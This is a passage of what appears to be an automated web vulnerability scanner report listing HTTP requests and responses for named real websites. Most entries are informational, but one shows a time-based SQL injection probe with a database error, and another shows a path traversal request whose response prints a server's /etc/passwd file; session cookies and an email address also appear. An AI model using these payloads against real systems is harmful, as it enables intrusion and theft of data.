Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Date: Fri, 06 May 2011 18:40:24 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...
31.45. http://www.eneighborhoods.com/menu/mm_css_menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menu/mm_css_menu.js

Request

GET /menu/mm_css_menu.js HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Date: Fri, 06 May 2011 18:40:24 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...
31.46. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pubspec/scripts/isE3OnHtx.asp

Request

GET /pubspec/scripts/isE3OnHtx.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=info
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 18
Content-Type: text/html
Cache-Control: private
Date: Fri, 06 May 2011 22:35:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 18

var isE3On = true;
31.47. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pubspec/scripts/isE3OnHtx.asp

Request

GET /pubspec/scripts/isE3OnHtx.asp HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`0`user=v.8,0,EX019BC74F84p$B7202000$84$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$94$FF$C5o$B2$E2$9D$21$D6$EF$B2u!e02000`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`383; p1=`gacct=v.1,1,215819496`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`99

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Length: 18
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:27 GMT
Connection: keep-alive

var isE3On = true;
31.48. http://www.ezflexplan.com/ContentPages/employers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/employers.html

Request

GET /ContentPages/employers.html?id=lbmc&email=tmangrum@lbmc.com&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 6158
Content-Type: text/html
Last-Modified: Thu, 11 Nov 2010 19:01:35 GMT
Accept-Ranges: bytes
ETag: "8e385edcd281cb1:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:37 GMT

<html>

<head>
<link rel="stylesheet" href="er_content.css" type="text/css">
<meta http-equiv="Content-Language" content="en-us">
<title>What is a Flexible Spending Account?</title>
<script lang
...[SNIP]...
31.49. http://www.ezflexplan.com/ContentPages/er_admintls.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/er_admintls.html

Request

GET /ContentPages/er_admintls.html HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/ContentPages/nav_employers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 2942
Content-Type: text/html
Last-Modified: Thu, 07 Feb 2002 18:05:46 GMT
Accept-Ranges: bytes
ETag: "0f9b7102b0c11:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:45:13 GMT

<html>

<head>
<title>Administrative Tools for Employers</title>
<style>
<!--
a:link { color: #6699cc }
a:visited { color: #999999 }
a:hover { color: #cc9900 }
p { fo
...[SNIP]...
31.50. http://www.ezflexplan.com/ContentPages/er_enrllmnttools.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/er_enrllmnttools.html

Request

GET /ContentPages/er_enrllmnttools.html HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/ContentPages/er_admintls.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 2547
Content-Type: text/html
Last-Modified: Fri, 28 Jan 2011 15:15:02 GMT
Accept-Ranges: bytes
ETag: "26b0aa22febecb1:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:45:19 GMT

<html>

<head>
<link rel="stylesheet" href="er_content.css" type="text/css">
<title>Enrollment Tools</title>
</head>

<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0">

<table cellspacing
...[SNIP]...
31.51. http://www.ezflexplan.com/ContentPages/er_htsuap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/er_htsuap.html

Request

GET /ContentPages/er_htsuap.html HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/ContentPages/nav_employers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 5215
Content-Type: text/html
Last-Modified: Tue, 03 Apr 2007 16:22:32 GMT
Accept-Ranges: bytes
ETag: "f81dd447c76c71:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:45:08 GMT

<html>

<head>
<link rel="stylesheet" href="er_content.css" type="text/css">
<title>How to Set-Up a Plan</title>
<script language="JavaScript" fptype="dynamicanimation">
<!--
function dynAnimat
...[SNIP]...
31.52. http://www.ezflexplan.com/ContentPages/nav_employers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/nav_employers.html

Request

GET /ContentPages/nav_employers.html HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 4111
Content-Type: text/html
Last-Modified: Wed, 20 Nov 2002 18:50:32 GMT
Accept-Ranges: bytes
ETag: "08cd7b3c590c21:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:39 GMT

<html>

<head>
<title>Employer Menu</title>
<base target="mainbody">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<SCRIPT L
...[SNIP]...
31.53. http://www.ezflexplan.com/navigation/frameset.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Request

GET /navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 814
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
31.54. http://www.ezflexplan.com/navigation/menu.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/menu.asp

Request

GET /navigation/menu.asp?id=lbmc&email=tmangrum@lbmc.com&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3032
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan Menu</title>
<script LANGUAGE="JavaScript">


//HoverCraft MouseOver Script


if (document.images)


{


var ImageDirectory = "../
...[SNIP]...
31.55. http://www.firstmateonline.com/businessinfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstmateonline.com
Path:   /businessinfo.php

Request

GET /businessinfo.php?location=17044%27%20and%20sleep%284%29%3d%27&sponsor=8159 HTTP/1.1
Cookie: fancyform=d9c8713861eb02680a2466c6a2547880; PHPSESSID=1efaeee0b0a2648e13c04a21839ee72b; zZ=a0
Host: www.firstmateonline.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:24:50 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 226

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and sleep(4)=\' AND s.publishonline = 1 AND s.deleted = 0 AND
...[SNIP]...
31.56. http://www.gofileroom.com/SessionRelease.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /SessionRelease.asp

Request

POST /SessionRelease.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gofileroom.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 16

[object Object]=

Response

HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 971
Content-Type: text/html
Expires: Sat, 07 May 2011 01:44:07 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQARABBTB=JPKJJINBIAOLHOGGNDMBGOOP; path=/
Date: Sat, 07 May 2011 01:45:07 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3325615626.20480.0000; path=/


<html>

<head>
<title>GoFileRoom</title>

<script src="/includes/js/GFRAJAX.js" type="text/javascript"></script>
<script type="text/javascript">

window.setTimeout('closeMe()', 2000);

fun
...[SNIP]...
31.57. http://www.gofileroom.com/lbmc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/

Request

GET /lbmc/ HTTP/1.1
Host: www.gofileroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerGFR_WWW_HTTP=2251873802.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 10672
Content-Type: text/html
Expires: Sat, 07 May 2011 01:43:13 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQQDACQB=MCGPLMNBAICKPDCMOMOHHOLJ; path=/
Date: Sat, 07 May 2011 01:44:13 GMT


<script language="javascript" type="text/javascript">
var protocol = "https://"
var server = "www.gofileroom.com"
var vRoot = ""
var gj= '/lbmc/Default.asp';
var httpAddress = window.location.h
...[SNIP]...
31.58. https://www.gofileroom.com/lbmc/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gofileroom.com
Path:   /lbmc/Default.asp

Request

GET /lbmc/Default.asp HTTP/1.1
Host: www.gofileroom.com
Connection: keep-alive
Referer: http://www.gofileroom.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerGFR_WWW_HTTP=2251873802.20480.0000; ASPSESSIONIDCQQDACQB=ICGPLMNBCLJHFOEMCEHHIHGA

Response

HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 10672
Content-Type: text/html
Expires: Sat, 07 May 2011 01:43:17 GMT
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:17 GMT


<script language="javascript" type="text/javascript">
var protocol = "https://"
var server = "www.gofileroom.com"
var vRoot = ""
var gj= '/lbmc/Default.asp';
var httpAddress = window.location.h
...[SNIP]...
31.59. http://www.hunton.com/FCWSite/Features/_xpress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Features/_xpress/

Request

GET /FCWSite/Features/_xpress/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:26:15 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
31.60. http://www.millersweld.com/error.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millersweld.com
Path:   /error.html

Request

GET /error.html HTTP/1.1
Host: www.millersweld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Tue, 03 May 2011 19:15:58 GMT
ETag: "4196569328"
Content-Type: text/html
Accept-Ranges: bytes
Connection: close
Date: Fri, 06 May 2011 19:09:58 GMT
Server: lighttpd
Content-Length: 517

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
31.61. http://www.networksolutions.com/jsonBrowserInfo.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /jsonBrowserInfo.do

Request

POST /jsonBrowserInfo.do?default-method=javascriptEnabled&data={%22javascriptEnabled%22:%22true%22} HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
Origin: http://www.networksolutions.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12; currency=USD; vertigo=false
Content-Length: 0

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:16:25 GMT
X-powered-by: Servlet/2.5
Content-type: text/html
Date: Sat, 07 May 2011 01:16:25 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:16:25 GMT; Path=/
Vary: accept-encoding
Content-Length: 16

{"success":true}
31.62. http://www.nextadvisor.com/includes/javascript.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Request

GET /includes/javascript.php?script=../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303691684.4.3.utmgclid=CKvepPW1tqgCFctw5QodwGjRAw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303677881.1303691684.4

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:39:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 1875

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/
...[SNIP]...
31.63. http://www.nutter.com/attorneys.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /attorneys.php

Request

GET /attorneys.php HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/home.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:14:56 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 21896

<!-- attorneys start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19
...[SNIP]...
31.64. http://www.nutter.com/careers.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Request

GET /careers.php HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/attorneys.php?AttorneyID=59
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
